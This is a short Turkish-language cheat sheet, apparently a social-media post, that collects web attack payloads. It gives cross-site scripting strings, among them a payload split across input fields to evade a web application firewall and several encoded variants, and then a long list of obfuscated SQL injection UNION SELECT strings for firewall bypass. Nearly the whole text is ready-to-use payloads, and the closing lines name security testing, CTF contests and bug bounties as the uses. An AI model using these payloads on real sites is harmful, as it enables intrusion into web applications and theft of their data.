Basit XSS (Bölünmüş Payload ile)
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol contenteditable onbeforeinput='location=b.value+c.value+d.value'>click and write here!
Amaç:
javascrip + t:aler + t(1) = javascript:alert(1)
Bu da WAF’i kandırıp XSS payload’unu çalıştırmak için.
Encode Edilmiş XSS Payload
Encoded:
"><track/onerror='confirm\%601\%60'>
Clean:
"><track/onerror='confirm1'>
Anlamı:
" = "
' = '
< = <
> = >
` = %60
WAF Atlatmalı XSS Örnekleri:
<svg/onload=confirm(1)>
<iframe/src=javascript:alert(1)>
<math><mi//xlink:href=javascript:alert(1)>
<body onresize=alert(1)>
<div onpointerover=alert(1)>hover me</div>
<video><source onerror=alert(1)>
<img src=x onerror=prompt(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
---
SQL INJECTION WAF BYPASS FLOOD
Standart UNION SELECT:
UNION SELECT 1,2,3
Yorum Satırı ve Versiyon Hack’i:
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
Alternatif UNION SELECT ifadeleri:
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
+un/**/ion+se/**/lect
/**/UNION/**//*!50000SELECT*//**/
Karakter Kodlamalarıyla:
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
%0Aunion%0Aselect%0A
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!u%6eion*/ /*!se%6cect*/
+uni*on+sel*ect+
Reverse SQL Strings:
REVERSE(noinu)+REVERSE(tceles)
Karmaşık ve Layer’lı Örnekler:
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A
/*!union*/+/*!select*/
/**//*!union*//**//*!select*//**/
+UnIoN/*&a=*/SeLeCT/*&a=*/
+un/**/ion+sel/**/ect+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+’UnI”On’+'SeL”ECT’
Tablo ve Kolon Denemeleri:
union(select(1),2,3)
UNION(SELECT(column)FROM(table))
union (select 1111,2222,3333)
union(select 1,2,3,4,5)
---
Ne işe yarar bu bilgiler?
Amaç : Açıklama
Güvenlik testleri : WAF zayıflıklarını tespit etmek
CTF yarışmaları : XSS/SQLi bayrakları bulmak
Bug bounty : Açıkları raporlayıp ödül almak
Instagram : NarcosGod
